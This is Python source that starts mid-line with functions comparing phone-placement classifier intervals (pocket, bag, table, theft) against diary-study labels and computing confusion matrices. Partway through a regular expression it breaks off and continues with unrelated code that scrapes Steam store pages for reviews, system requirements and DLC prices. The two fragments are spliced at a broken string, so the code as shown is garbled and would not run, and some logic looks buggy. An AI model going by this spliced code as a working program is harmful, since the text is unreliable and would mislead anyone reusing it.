= findConflictingClassifications(results, True)\n if len(conflicitingClassifications) > 0:\n csvRow += [intervalsToString(conflicitingClassificationsIncludingTheft)]\n else:\n csvRow += [\"No times when multiple classifiers output 1\"]\n\n\ndef findConflictingClassifications(results, includeTheft):\n conflictingVal = 1\n conflicitingClassifications = []\n for classifier in results:\n if includeTheft or classifier != classifiers.THEFT_CLASSIFIER:\n intervals = results[classifier][1][conflictingVal]\n conflicitingClassifications = findCommonIntervals(conflicitingClassifications, intervals)\n\n return conflicitingClassifications\n\ndef mergeAdjacentIntervalsByValue(intervals):\n i = 0\n while i + 1 < len(intervals):\n curr = intervals[i]\n next = intervals[i + 1]\n if curr[1] == next[1]:\n intervals[i] = ((curr[0][0], next[0][1]), curr[1])\n del intervals[i + 1]\n else:\n i += 1 \n\ndef mergeAdjacentIntervals(intervals):\n i = 0\n while i + 1 < len(intervals):\n curr = intervals[i]\n next = intervals[i + 1]\n if curr[1] == next[0]:\n intervals[i] = (curr[0], next[1])\n del intervals[i + 1]\n else:\n i += 1 \n\n\ndef filterSpikesFromIntervals(intervals, intervalsByValue):\n spikeLength = datetime.timedelta(seconds=1)\n i = 1\n indexAddedToIntervalsByValue = -1\n while i < len(intervals) - 1:\n interval, intervalBefore, intervalAfter = intervals[i], intervals[i - 1], intervals[i + 1]\n\n timeInterval = interval[0]\n\n if timeInterval[1] - timeInterval[0] <= spikeLength:\n newTimeInterval = (intervalBefore[0][0], intervalAfter[0][1])\n intervals[i - 1] = (newTimeInterval, intervalBefore[1])\n del intervals[i:i+2]\n else:\n timeIntervalBefore = intervalBefore[0]\n classification = intervalBefore[1]\n intervalsByValue[classification].append(timeIntervalBefore)\n indexAddedToIntervalsByValue = i - 1\n i += 1\n\n for j in range(indexAddedToIntervalsByValue + 1, len(intervals)):\n interval = intervals[j]\n timeInterval = interval[0]\n classification = interval[1]\n intervalsByValue[classification].append(timeInterval)\n\n\ndef findCommonIntervalsByValue(intervals1, intervals2, value):\n # print(\"Finding common intervals!\")\n # print intervals1\n # print intervals2\n\n if len(intervals1) == 0 and len(intervals2) == 0:\n return []\n if len(intervals1) == 0:\n return intervals2\n if len(intervals2) == 0:\n return intervals1 \n\n def advance(intervals, i, value):\n while i < len(intervals) and intervals[i][1] != value:\n # print(i)\n i += 1\n return i \n\n i1 = advance(intervals1, 0, value) \n i2 = advance(intervals2, 0, value)\n # print i1, i2 \n \n commonIntervals = []\n while i1 < len(intervals1) and i2 < len(intervals2):\n interval1 = intervals1[i1][0]\n interval2 = intervals2[i2][0]\n # # print(i1, i2)\n laterStartingInterval, earlierStartingInterval = None, None\n later_i, earlier_i = None, None\n\n if interval1[0] >= interval2[0]:\n laterStartingInterval, earlierStartingInterval = interval1, interval2\n later_i, earlier_i = i1, i2\n else:\n laterStartingInterval, earlierStartingInterval = interval2, interval1\n later_i, earlier_i = i2, i1\n\n if laterStartingInterval[0] >= earlierStartingInterval[1]:\n if earlier_i == i1:\n i1 = advance(intervals1, i1, value)\n else:\n i2 = advance(intervals2, i2, value)\n \n else:\n earlierEndingInterval = earlierStartingInterval if earlierStartingInterval[1] <= laterStartingInterval[1] else laterStartingInterval\n\n commonIntervals.append((laterStartingInterval[0], earlierEndingInterval[1]))\n # print commonIntervals\n\n if earlierStartingInterval[1] == laterStartingInterval[1]:\n # print \"End times are equal\"\n i1 = advance(intervals1, i1, value)\n i2 = advance(intervals2, i2, value)\n\n elif earlierStartingInterval[1] < laterStartingInterval[1]:\n # print \"Early start ends earlier, advance early\"\n if earlier_i == i1:\n i1 = advance(intervals1, i1, value)\n else:\n i2 = advance(intervals2, i2, value)\n # print i1, i2\n else:\n # print \"Early start ends later, advance later\"\n if later_i == i1:\n i1 = advance(intervals1, i1, value)\n else:\n i2 = advance(intervals2, i2, value)\n # print i1, i2\n\n return commonIntervals\n\ndef compareIntervals(intervals1, intervals2):\n i1 = 0\n i2 = 0\n interval1 = intervals1[i1][0]\n interval2 = intervals2[i2][0]\n class1 = intervals1[i1][1]\n class2 = intervals1[i2][1]\n\n startTime = interval1[0] if interval1[0] > interval2[0] else interval2[0]\n endTime = None\n\n comparedIntervals = []\n matchingIntervals = []\n conflictingIntervals = []\n while i1 < len(intervals1) and i2 < len(intervals2):\n interval1 = intervals1[i1][0]\n interval2 = intervals2[i2][0]\n class1 = intervals1[i1][1]\n class2 = intervals2[i2][1]\n\n if interval1[1] == interval2[1]:\n endTime = interval1[1]\n i1 += 1\n i2 += 1\n elif interval1[1] < interval2[1]:\n endTime = interval1[1]\n i1 += 1\n else:\n endTime = interval2[1]\n i2 += 1\n\n comparedClass = None\n matchingClasses = False\n if class1 == class2:\n comparedClass = class1\n matchingClasses = True\n else:\n comparedClass = str(class1) + \" | \" + str(class2)\n\n comparedInterval = ((startTime, endTime), comparedClass, matchingClasses)\n comparedIntervals.append(comparedInterval)\n\n if matchingClasses:\n matchingIntervals.append(comparedInterval)\n else:\n conflictingIntervals.append(comparedInterval)\n\n startTime = endTime\n\n return comparedIntervals, matchingIntervals, conflictingIntervals\n\n\ndef totalTimeOfIntervals(intervals):\n timeConnected = datetime.timedelta(seconds=00)\n prevState = -1\n for interval, classified, state in intervals:\n start = interval[0]\n end = interval[1]\n timeInBetween = end - start\n timeConnected += timeInBetween\n prevState = end\n\n return timeConnected\n\n\ndef getExpectedIntervals(file):\n intervals = []\n with open(file) as f: \n reader = csv.reader(f)\n prevTime = -1\n prevState = -1\n for row in reader: \n startTime = datetime.datetime.strptime(row[0] + \" \" + row[1], \"%m/%d/%y %H:%M\")\n if prevTime != -1:\n intervals.append(((prevTime, startTime), prevState))\n prevTime = startTime\n prevState = row[2]\n return intervals\n\n\n\n### Joanna Finish #####\n# actualIntervals is a list of intervals, classifications like [((startTime, endTime), \"table\"), ((start, end), \"pocket\")]\ndef checkClassifications(actualIntervals, DATA_DAY, NOW_TIME, expectedIntervals=None, expectedNoSteady = None, normalIntervals=None):\n # However you want to load the expectedIntervals, maybe parse a text file?\n # Just make sure to load them as a list with each item formatted as ((startDateTime, endDateTime), classification)\n\n classificationIntervals = {}\n noSteadyState = combineSteadyState(actualIntervals)\n # print(noSteadyState)\n accuracyLengths = classificationAccWithoutPolicy(actualIntervals, expectedIntervals)\n noSteadyAccuracyLenghts = classificationAccWithoutPolicy(noSteadyState, expectedNoSteady)\n\n # print(accuracyLengths)\n comparedIntervals, matchingIntervals, conflictingIntervals = compareIntervals(normalIntervals, expectedIntervals)\n policyNoSteady = filterSteadyState(comparedIntervals);\n # print(\"STEADY STATE FILTERING: \" );\n # print(intervalsWithoutSteady);\n classificationAccuracy = getClassificationAccuracy(comparedIntervals)\n # print(classificationAccuracy)\n print(\"Policy Confusion Matrix with Steady State\")\n # print(classifierConfusionMatrix(classificationAccuracy))\n noSteadyAccuracy = getClassificationAccuracy(policyNoSteady)\n print(\"Policy Confusion Matrix with NO Steady State\")\n # print(classifierConfusionMatrix(noSteadyAccuracy))\n\n for c in classifiers.CLASSIFIERS:\n # print(actualIntervals[c])\n # if c != classifiers.BACKPACK_CLASSIFIER:\n # continue\n print(c)\n\n\n # comparedIntervals, matchingIntervals, conflictingIntervals = classificationAccWithoutPolicy(actualIntervals[c], expectedIntervals, c)\n # classificationIntervals[c] = (comparedIntervals, matchingIntervals, conflictingIntervals)\n # accuracyLengths = classificationAccWithoutPolicy(actualIntervals, expectedIntervals, c)\n\n\n # print(accuracyLengths)\n\n # print(c)\n # print(matchingIntervals)\n # return\n\n # file = open(RESULTS_DIRECTORY + '/' + 'diary-study-stats-' + DATA_DAY + NOW_TIME + '_' + c +'.txt', 'w+')\n\n # file.write(\"############ DIARY STUDY COMPARISON ############## \\n\")\n\n # interval1, classification1, ismatch1 = comparedIntervals[0]\n # interval2, classification2, ismatch2 = comparedIntervals[-1]\n # totalTime = interval2[1] - interval1[0]\n # matchingTime = totalTimeOfIntervals(matchingIntervals)\n # conflictingTime = totalTimeOfIntervals(conflictingIntervals)\n # print(comparedIntervals)\n # return\n\n # print(\"BEFORE FILTERING\");\n # print(comparedIntervals);\n # comparedIntervals = filterSteadyState(comparedIntervals);\n # print(\"STEADY STATE FILTERING: \" );\n # print(intervalsWithoutSteady);\n # classificationAccuracy = getClassificationAccuracy(comparedIntervals, c);\n # print(classificationAccuracy)\n ccm = classifierConfusionMatrix(accuracyLengths[c])\n print(\"Classifier Confusion matrix with Steady State\")\n print(ccm)\n ccm_no = classifierConfusionMatrix(noSteadyAccuracyLenghts[c])\n print(\"Classifier Confusion Matrix with NO Steady State\")\n print(ccm_no)\n\n # accuracyNoSteady = classificationAccWithoutPolicy(noSteadyState[c], expectedIntervals, c)\n # ccm_no = classifierConfusionMatrix(accuracyNoSteady)\n # print(\"Confusion matrix with Steady State\")\n # print(ccm_no)\n # return\n\n\n # file.write(\"Total Time: \" + formatTimeValue(totalTime) + \"\\n\")\n # file.write(\"Total time matching: \" + formatTimeValue(matchingTime) +\"\\n\")\n # file.write(\"% of time matched: \" + str(1.0 * matchingTime/totalTime) + \"\\n\")\n # file.write(\"Total time conflicting: \" + formatTimeValue(conflictingTime) + \"\\n\")\n # file.write(\"% of time conflicted: \" + str(1.0 * conflictingTime/totalTime) + \"\\n\")\n\n # file.write(\"\\n\")\n # file.write(\"\\n\")\n # filterConflicting = getConflictingIntervals(intervalsWithoutSteady)\n\n # file.write(\"All conflicting intervals: \\n\")\n # for interval, classificationString, isMatching in comparedIntervals:\n # file.write(formatTimeValue(interval, withDate=True) + \": \" + classificationString + \"\\n\")\n\n # file.write(\"Conflicting intervals by length:\\n\")\n # for interval, classificationString, isMatching in sorted(comparedIntervals, key=lambda x: intervalLength(x[0]), reverse=True):\n # file.write(formatTimeValue(interval, withDate=True) + \": \" + formatTimeValue(intervalLength(interval))[:15] + \": \" + classificationString + \"\\n\")\n\n # file.close()\n for c in classifiers.CLASSIFIERS:\n print(c)\n if c not in classificationAccuracy:\n continue\n print(\"Policy Confusion Matrix with Steady State\")\n print(classifierConfusionMatrix(classificationAccuracy[c]))\n noSteadyAccuracy = getClassificationAccuracy(policyNoSteady)\n print(\"Policy Confusion Matrix with NO Steady State\")\n print(classifierConfusionMatrix(noSteadyAccuracy[c]))\n\n # Write the results to some file, probably also calculate some stats on what % of time we match/don't match\n # All of comparedIntervals, matchingIntervals, and conflictingIntervals have the following format:\n # ((startDateTime, endDateTime), classificationString, isMatchingClassifications)\n # the classificationString is either one classifier if the expected/actual matched, else two classifier names\n\n# classifier = [true positive, false positive, false negtive, total time]\n\ndef classificationAccWithoutPolicy(intervals1, intervals2):\n i1 = 0\n i2 = 0\n \n interval1 = intervals1[i1][0]\n interval2 = intervals2[i2][0]\n class2 = intervals1[i2][1]\n classifierToVal = intervals1[i1][1]\n\n startTime = interval1[0] if interval1[0] > interval2[0] else interval2[0]\n endTime = None\n\n comparedIntervals = []\n matchingIntervals = []\n conflictingIntervals = []\n accuracyLengths = {}\n while i1 < len(intervals1) and i2 < len(intervals2):\n interval1 = intervals1[i1][0]\n interval2 = intervals2[i2][0]\n class2 = intervals2[i2][1]\n classifierToVal = intervals1[i1][1]\n\n if interval1[1] == interval2[1]:\n endTime = interval1[1]\n i1 += 1\n i2 += 1\n elif interval1[1] < interval2[1]:\n endTime = interval1[1]\n i1 += 1\n else:\n endTime = interval2[1]\n i2 += 1\n\n comparedClass = None\n # matchingClasses = False\n length = intervalLength((startTime, endTime))\n for c in classifierToVal:\n # print(c)\n classification = classifierToVal[c]\n if c not in accuracyLengths:\n accuracyLengths[c] = [datetime.timedelta(seconds=0)] * 4\n if c == class2:\n if sum(classification) * 1.0 / len(classification) >= 0.5:\n accuracyLengths[c][0] += length\n # print(\"TRUE POSITIVES\")\n # print(class1)\n # print(class2)\n # print(classification)\n # print(\"\\n\")\n else:\n # if class2 == classifiers.HAND_CLASSIFIER:\n\n # print(\"FALSE NEGATIVES\")\n # # print(class1)\n # print(class2)\n # print(classifierToVal)\n # print((startTime, endTime))\n\n # print(\"\\n\")\n\n\n accuracyLengths[c][2] += length\n #false negatives\n else:\n if sum(classification) * 1.0 / len(classification) > 0.5:\n #false positive\n # print(\"FALSE POSITIVE\")\n # print(class1)\n # print(class2)\n # print(classification)\n # print(sum(classification) * 1.0 / len(classification))\n # print((startTime, endTime))\n # print(\"\\n\")\n\n accuracyLengths[c][1] += length\n\n else :\n # print(\"TRUE NEGATIVES\")\n # print(classification)\n # print(class1)\n # print(class2)\n # print((startTime, endTime))\n # print(\"\\n\")\n accuracyLengths[c][3] += length\n\n\n\n startTime = endTime\n return accuracyLengths\n\n\ndef combineSteadyState(actualIntervals):\n results = []\n i = 0\n\n interval1 = actualIntervals[i][0]\n classifierToVal = actualIntervals[i][1]\n\n prev = {}\n while i < 5:\n interval1 = actualIntervals[i][0]\n classifierToVal = actualIntervals[i][1]\n for c in classifiers.CLASSIFIERS:\n if c not in prev:\n prev[c] = [0]* 5\n prev[c][i%5] = sum(classifierToVal[c]) * 1.0 / len(classifierToVal[c])\n results.append((interval1, classifierToVal))\n i+=1\n\n while i < len(actualIntervals):\n interval1 = actualIntervals[i][0]\n classifierToVal = actualIntervals[i][1]\n prevVal = 0\n prevClass = classifiers.TABLE_CLASSIFIER\n for c in prev:\n if sum(prev[c]) > prevVal:\n prevClass=c\n prevVal = sum(prev[c])\n prev[c][i%5] = sum(classifierToVal[c]) * 1.0 / len(classifierToVal[c])\n condition = sum(classifierToVal[prevClass]) * 1.0 / len(classifierToVal[prevClass]) < 0.5 and sum(classifierToVal[classifiers.STEADY_STATE_CLASSIFIER]) * 1.0 / len(classifierToVal[classifiers.STEADY_STATE_CLASSIFIER]) >= 0.5\n if condition:\n classifierToVal[prevClass] = [1]\n\n results.append((interval1, classifierToVal))\n i+=1\n return results\n\n\n\ndef filterSteadyState(comparedIntervals):\n result = []\n i = 0\n previous = classifiers.STEADY_STATE_CLASSIFIER;\n while (i < len(comparedIntervals)):\n interval, classicationString, isMatching = comparedIntervals[i]\n tokens = classicationString.split(\"|\")\n chosen = tokens[0]\n chosen = chosen.strip()\n if not isMatching:\n expected = tokens[1]\n expected = expected.strip()\n if chosen == classifiers.STEADY_STATE_CLASSIFIER:\n chosen = previous\n else:\n previous = chosen\n if not isMatching and expected == chosen:\n isMatching = True\n result.append((interval, chosen, isMatching));\n else:\n result.append((interval, chosen + \"|\" + expected, isMatching))\n i+=1\n \n return result\n\n\ndef getClassificationAccuracy(comparedIntervals):\n confusionList = {}\n for interval, classificationString, isMatching in comparedIntervals:\n tokens = classificationString.split(\"|\");\n chosen = tokens[0]\n chosen = chosen.strip()\n # if chosen == classifiers.STEADY_STATE_CLASSIFIER:\n # continue\n if not isMatching:\n expected = tokens[1]\n expected = expected.strip()\n # if expected == classifiers.STEADY_STATE_CLASSIFIER:\n # continue\n if expected not in confusionList:\n confusionList[expected] = [datetime.timedelta(seconds=0)] * 4\n if chosen not in confusionList:\n confusionList[chosen] = [datetime.timedelta(seconds=0)] * 4\n length = intervalLength(interval)\n if isMatching:\n confusionList[chosen][0] += length\n else:\n confusionList[chosen][1] += length\n confusionList[expected][2] += length\n confusionList[expected][3] += length\n confusionList[chosen][3] += length\n\n totalTime = totalTimeOfIntervals(comparedIntervals) \n for c in confusionList:\n tp, fp, fn, tt = confusionList[c]\n tn = totalTime - tp - fp -fn\n confusionList[c][3] = tn\n return confusionList\n\ndef classifierConfusionMatrix(confusionList):\n tp, fp, fn, tn = confusionList\n posTotal = tp + fn\n negTotal = tn + fp\n if posTotal == datetime.timedelta(seconds=0):\n tp = \"N/A\"\n fn = \"N/A\"\n else:\n tp = 1.0 * tp/posTotal\n fn = 1.0 * fn/posTotal\n confusionMatrix = [tp, 1.0 * fp/negTotal, fn, 1.0 * (tn/negTotal)]\n return confusionMatrix\n\n\n\ndef findCommonIntervals(intervals1, intervals2):\n # print(\"Finding common intervals!\")\n # print intervals1\n # print intervals2\n\n if len(intervals1) == 0 and len(intervals2) == 0:\n return []\n if len(intervals1) == 0:\n return []\n if len(intervals2) == 0:\n return []\n\n i1 = 0\n i2 = 0\n # print \"Starting\"\n # print i1, i2 \n \n commonIntervals = []\n while i1 < len(intervals1) and i2 < len(intervals2):\n interval1 = intervals1[i1]\n interval2 = intervals2[i2]\n\n laterStartingInterval, earlierStartingInterval = None, None\n later_i, earlier_i = None, None\n\n if interval1[0] >= interval2[0]:\n # print(\"Interval1 starts after Interval2\")\n laterStartingInterval, earlierStartingInterval = interval1, interval2\n later_i, earlier_i = \"i1\", \"i2\"\n else:\n # print(\"Interval2 starts after Interval1\")\n laterStartingInterval, earlierStartingInterval = interval2, interval1\n later_i, earlier_i = \"i2\", \"i1\"\n\n if laterStartingInterval[0] >= earlierStartingInterval[1]:\n # print(\"GOODBYE\")\n # print(\"Later starting interval starts completely after early interval\")\n if earlier_i == \"i1\":\n i1 += 1\n else:\n i2 += 1\n \n else:\n # print(\"HELLO\")\n earlierEndingInterval = earlierStartingInterval if earlierStartingInterval[1] <= laterStartingInterval[1] else laterStartingInterval\n # print(\"Earlier ending interval:\", formatTimeInterval(earlierEndingInterval))\n \n commonIntervals.append((laterStartingInterval[0], earlierEndingInterval[1]))\n # print(\"Common Intervals:\")\n # for interval in commonIntervals:\n # print(formatTimeInterval(interval))\n\n\n if earlierStartingInterval[1] == laterStartingInterval[1]:\n # print(\"End times are equal\")\n i1 += 1\n i2 += 1\n\n elif earlierStartingInterval[1] < laterStartingInterval[1]:\n # print(\"Early start ends earlier, advance early\")\n if earlier_i == \"i1\":\n i1 += 1\n else:\n i2 += 1\n # print i1, i2\n else:\n # print(\"Early start ends later, advance later\")\n if later_i == \"i1\":\n i1 += 1\n else:\n i2 += 1\n # print i1, i2\n\n return commonIntervals\n\n\n\ndef plotIntervals(intervals):\n times = []\n values = []\n\n for interval in intervals:\n time = interval[0]\n times.append(time[0])\n times.append(time[1])\n values.append(interval[1])\n values.append(interval[1])\n\n times = date2num(times)\n\n seconds = SecondLocator() # every year\n minutes = MinuteLocator() # every month\n hours = HourLocator()\n hoursFmt = DateFormatter('%H:%M')\n minutesFmt = DateFormatter('%H:%M:%S')\n\n fig, ax = plt.subplots()\n ax.plot_date(times, values, '-')\n\n # format the ticks\n ax.xaxis.set_major_locator(hours)\n ax.xaxis.set_major_formatter(hoursFmt)\n ax.xaxis.set_minor_locator(minutes)\n ax.autoscale_view()\n\n\n # format the coords message box\n ax.fmt_xdata = DateFormatter('%H:%M')\n ax.grid(True)\n\n axes = plt.gca()\n axes.set_ylim([-0.25, 1.25])\n\n fig.autofmt_xdate()\n plt.show()\n\n\ndef intervalLength(interval):\n try:\n return interval[1] - interval[0]\n except:\n return datetime.timedelta(seconds=0)\n\n\ndef classifierPolicy(classifiedWindow):\n averagedClassifications = []\n for c, labels in classifiedWindow.items():\n positives = labels.count(1)\n negatives = labels.count(0)\n if positives > negatives:\n averagedClassifications.append(c)\n if len(averagedClassifications) == 1:\n return averagedClassifications[0].getName()\n #use policy (most dangerous) among conflicting classifications\n c = classifiers.CLASSIFIERS\n if c[classifiers.TABLE_CLASSIFIER] in averagedClassifications:\n return classifiers.TABLE_CLASSIFIER\n elif c[classifiers.STEADY_STATE_CLASSIFIER] in averagedClassifications:\n return classifiers.STEADY_STATE_CLASSIFIER\n elif c[classifiers.BACKPACK_CLASSIFIER] in averagedClassifications:\n return classifiers.BACKPACK_CLASSIFIER\n elif c[classifiers.BAG_CLASSIFIER] in averagedClassifications:\n return classifiers.BAG_CLASSIFIER\n elif c[classifiers.POCKET_CLASSIFIER] in averagedClassifications:\n return classifiers.POCKET_CLASSIFIER\n elif c[classifiers.HAND_CLASSIFIER] in averagedClassifications:\n return classifiers.HAND_CLASSIFIER\n else: \n return \"Unknown\"\n\n###### Utilities #######\n\ndef filesToTimesToFilesDict(files, userID, instrument):\n timesToFiles = {}\n for f in files:\n time = getTimeFromFile(f, userID, instrument, True)\n timesToFiles[time] = f \n return timesToFiles\n\ndef timeStringToDateTime(timestring):\n return datetime.datetime.strptime(timestring, '%Y_%m_%d_%H_%M_%S')\n\ndef timeStringsToDateTimes(timeStrings):\n return [timeStringToDateTime(timeString) for timeString in timeStrings]\n\ndef formatTime(dateTime, withDate=False):\n if type(dateTime) is not datetime.datetime:\n return str(datetime)\n if withDate:\n return dateTime.strftime('%b %d|%H:%M:%S')\n return dateTime.strftime('%H:%M:%S')\n\ndef formatTimeDelta(timeDelta):\n totalSeconds = timeDelta.total_seconds()\n return formatTotalSeconds(totalSeconds)\n\ndef formatTotalSeconds(totalSeconds):\n hours = totalSeconds // 3600\n minutes = (totalSeconds % 3600) // 60\n seconds = totalSeconds % 60\n return str(hours) + 'h:' + str(minutes) + 'm:' + str(seconds) + 's' \n\ndef formatTimeInterval(timeInterval, withDate=False):\n if withDate:\n return '(' + formatTime(timeInterval[0], withDate=True) + '--' + formatTime(timeInterval[1], withDate=True) + ')'\n else:\n return '(' + formatTime(timeInterval[0]) + '--' + formatTime(timeInterval[1]) + ')' \n\ndef formatTimeValue(timeValue, withDate=False):\n if type(timeValue) is str or type(timeValue) is int:\n return str(timeValue) \n if type(timeValue) is datetime.datetime:\n return formatTime(timeValue, withDate)\n elif type(timeValue) is datetime.timedelta:\n return formatTimeDelta(timeValue)\n else:\n # must be an interval\n return formatTimeInterval(timeValue, withDate)\n\n\ndef getTimeFromFile(filename, userID, instrument):\n query = DIRECTORY + 'AppMon' + '_' + userID + '.*_' + instrument + '_' + \\\n '(?P
        (.*?)Curators have reviewed this product',\n repr(content_text))\n if len(curator) > 0:\n curator = clean_trn(curator[0])\n else:\n curator = -1\n\n reviews = tree_info.xpath('//*[@id=\"userReviews\"]/div//text()')\n reviews = [clean_trn(x) for x in reviews if clean_trn(x).replace(' ', '').replace(',', '') not in [\"\",\"*\"]]\n reviews_dict = {}\n idx = 0\n while idx < len(reviews):\n if reviews[idx][-1] == \":\":\n key = reviews[idx][:-1]\n reviews_dict[key] = []\n else:\n reviews_dict[key].append(reviews[idx])\n idx += 1\n\n recent_review_count = None\n recent_review_sum = None\n recent_review_detail = None\n recent_review_percent = None\n review_bool = 1\n review_not_enough_bool = 0\n review_count = None\n review_sum = None\n review_detail = None\n review_percent = None\n\n if 'Recent Reviews' in reviews_dict.keys():\n\n if len(reviews_dict['Recent Reviews']) > 2 and reviews_dict['Recent Reviews'][1].strip()[0] == '(' and reviews_dict['Recent Reviews'][1].strip()[-1] == ')':\n recent_review_count = int(reviews_dict['Recent Reviews'][1].replace('(', '').replace(')', '').replace(',', ''))\n recent_review_sum = reviews_dict['Recent Reviews'][0]\n recent_review_detail = reviews_dict['Recent Reviews'][2]\n recent_review_percent = re.findall(r'[0-9]+%', recent_review_detail)\n recent_review_percent = recent_review_percent[0]\n else:\n print(app_id)\n raise\n #\n # elif len(reviews_dict['Recent Reviews']) > 1 and len(re.findall(r'[0-9]+%', reviews_dict['Recent Reviews'][1])) > 0:\n # recent_review_detail = reviews_dict['Recent Reviews'][1]\n # recent_review_percent = re.findall(r'[0-9]+%', recent_review_detail)\n # recent_review_sum = reviews_dict['Recent Reviews'][0]\n # recent_review_count = re.findall(r' (\\d+(?:[.,]\\d+)*) ',recent_review_detail)\n # recent_review_count = recent_review_count[0]\n\n if 'All Reviews' in reviews_dict.keys():\n\n if len(reviews_dict['All Reviews']) > 2 and reviews_dict['All Reviews'][1].strip()[0] == '(' and reviews_dict['All Reviews'][1].strip()[-1] == ')':\n review_count = int(reviews_dict['All Reviews'][1].replace('(', '').replace(')', '').replace(',', ''))\n review_sum = reviews_dict['All Reviews'][0]\n review_detail = reviews_dict['All Reviews'][2]\n review_percent = re.findall(r'[0-9]+%', review_detail)\n review_percent = review_percent[0]\n\n # elif len(reviews_dict['All Reviews']) > 1 and len(re.findall(r'[0-9]+%', reviews_dict['All Reviews'][1])) > 0:\n # review_detail = reviews_dict['All Reviews'][1]\n # review_percent = re.findall(r'[0-9]+%', review_detail)\n # review_sum = reviews_dict['All Reviews'][0]\n # review_count = re.findall(r' (\\d+(?:[.,]\\d+)*) ',review_detail)\n # review_count = review_count[0]\n\n elif len(reviews_dict['All Reviews']) > 1 and reviews_dict['All Reviews'][1] == '- Need more user reviews to generate a score':\n review_count = re.findall(r'[0-9]+', reviews_dict['All Reviews'][0])[0]\n review_not_enough_bool = 1\n elif reviews_dict['All Reviews'][0] == 'No user reviews':\n review_bool = 0\n else:\n print(app_id)\n raise\n\n system_name_list = tree_info.xpath('//div[contains(@class,\"sysreq_tab\")]')\n system_name_list = [clean_trn(x.xpath('./text()')[0]) for x in system_name_list]\n system_name_list = [x.strip() for x in system_name_list if x.strip() != \"\"]\n system_num = len(system_name_list)\n system_req_list = tree_info.xpath('//div[contains(@class,\"game_area_sys_req sysreq_content\")]')\n system_req_list = [x.xpath('.//text()') for x in system_req_list]\n sys_list = []\n if system_num == 0 and len(system_req_list) == 0:\n pass\n elif system_num == 0:\n system_num += 1\n assert len(system_req_list) == 1\n sys_text = [clean_trn(x) for x in system_req_list[0] if\n clean_trn(x).replace(' ', '').replace(',', '') != \"\"]\n if len(sys_text) > 0:\n sys_card = get_sys_list(sys_text)\n if 'OS' in sys_card['Minimum'].keys():\n sys_list.append({\"system\":sys_card['Minimum']['OS'],'Minimum':sys_card['Minimum'],'Recommended':sys_card['Recommended']})\n else:\n sys_list.append({\"system\": None, 'Minimum': sys_card['Minimum'],'Recommended': sys_card['Recommended']})\n else:\n assert system_num == len(system_req_list)\n for sys_name, sys_detail in zip(system_name_list, system_req_list):\n sys_detail = [clean_trn(x) for x in sys_detail if\n clean_trn(x).replace(' ', '').replace(',', '') != \"\"]\n if len(sys_detail) > 0:\n sys_card = get_sys_list(sys_detail)\n sys_list.append({\"system\":sys_name, 'Minimum': sys_card['Minimum'],\n 'Recommended': sys_card['Recommended']})\n\n DLC_bool = 0\n DLC_count = 0\n DLC_detail_list = []\n DLC = tree_info.xpath('//*[@class=\"gameDlcBlocks\"]/a')\n DLC_expend = tree_info.xpath('//*[@id=\"game_area_dlc_expanded\"]/a')\n if len(DLC) > 0:\n DLC_bool = 1\n if len(DLC_expend) > 0:\n DLC += DLC_expend\n DLC_count = len(DLC)\n for dlc in DLC:\n name_list = clean_trn(dlc.xpath('./*[@class=\"game_area_dlc_name\"]//text()')[0])\n price_list = [clean_trn(x) for x in dlc.xpath('./*[@class=\"game_area_dlc_price\"]//text()') if\n clean_trn(x) != \"\"][-1].replace(\"$\", \"\")\n DLC_detail_list.append((name_list, price_list))\n\n new_item_dict = {\n 'game_id': app_id,\n 'name': app_name,\n 'request_status':'Available',\n 'game_title': game_title,\n 'IF_DLC': IF_DLC,\n 'genre': genre,\n 'genre_count': genre_count,\n 'developer': developer,\n 'developer_count': developer_count,\n 'publisher': publisher,\n 'publisher_count': publisher_count,\n 'franchiser': franchiser,\n 'franchiser_count': franchiser_count,\n 'release_date': release_date,\n 'usertag': usertag,\n 'usertag_count': usertag_count,\n 'description_short': description_short,\n 'description_title': description_title,\n 'description_long': description_long,\n 'price': price_,\n 'feature': feature,\n 'feature_count': feature_count,\n 'steam_learning': steam_learning,\n 'language': language,\n 'language_count': language_count,\n 'rating': rating,\n 'rating_standard': rating_standard,\n 'rating_icon': rating_icon,\n 'award_bool': award_bool,\n 'award': award,\n 'metacritic': metacritic,\n 'curator': curator,\n 'review_bool': review_bool,\n 'review_not_enough_bool': review_not_enough_bool,\n 'review_count': review_count,\n 'review_sum': review_sum,\n 'review_detail': review_detail,\n 'review_percent': review_percent,\n 'recent_review_count': recent_review_count,\n 'recent_review_sum': recent_review_sum,\n 'recent_review_detail': recent_review_detail,\n 'recent_review_percent': recent_review_percent,\n 'system_count': system_num,\n 'sys_card': sys_list,\n 'DLC_bool': DLC_bool,\n 'DLC_count': DLC_count,\n 'DLC_detail_list': DLC_detail_list, }\n return new_item_dict\n\n\ndef get_onepackage(content_text, pre_difined_item):\n app_id = pre_difined_item['game_id']\n app_name = pre_difined_item['name']\n tree_info = etree.HTML(content_text)\n game_title = tree_info.xpath('//*[@id=\"appHubAppName\"]//text()')\n info_card = tree_info.xpath('//*[@class=\"details_block\"]//p//text()')\n info_card = [clean_trn(x) for x in info_card if clean_trn(x).replace(' ', '').replace(',', '') != \"\"]\n init_card = {}\n idx = 0\n key = None\n while idx < len(info_card):\n if info_card[idx][-1] == \":\":\n key = info_card[idx][:-1]\n init_card[key] = []\n elif key:\n init_card[key].append(info_card[idx])\n idx += 1\n\n developer = []\n developer_count = 0\n if 'Developer' in init_card.keys():\n developer = init_card['Developer']\n developer_count = len(developer)\n\n publisher = []\n publisher_count = 0\n if 'Publisher' in init_card.keys():\n publisher = init_card['Publisher']\n publisher_count = len(publisher)\n\n franchiser = []\n franchiser_count = 0\n if 'Franchise' in init_card.keys():\n franchiser = init_card['Franchise']\n franchiser_count = len(franchiser)\n\n language = []\n language_count = 0\n if 'Languages' in init_card.keys():\n language = [x.strip() for x in init_card['Languages'][0].split(',')]\n language_count = len(language)\n\n release_date = init_card['Release Date'][0]\n release_date = convert_month(release_date)\n\n description_title = check_blank(\n ' '.join([clean_trn(x) for x in tree_info.xpath('//*[@id=\"game_area_description\"]/h2/text()')])).strip()\n description_long = check_blank(\n ' '.join([clean_trn(x) for x in tree_info.xpath('//*[@id=\"game_area_description\"]//text()')]))\n description_long = description_long.replace(description_title, \"\").strip()\n\n price_ = -1\n purchase = tree_info.xpath('//*[@class=\"game_purchase_action\"]')\n if len(purchase) > 0:\n purchase = purchase[0].xpath('.//text()')\n price = [clean_trn(x) for x in purchase if clean_trn(x).replace(' ', '').replace(',', '') != \"\"]\n for i in range(len(price)):\n if price[i] == 'Add to Cart':\n break\n if '$' in price[i]:\n price_ = price[i].replace('$', '')\n if price[i] in ['Free to Play', 'Free', 'Play Game'] or 'Free' 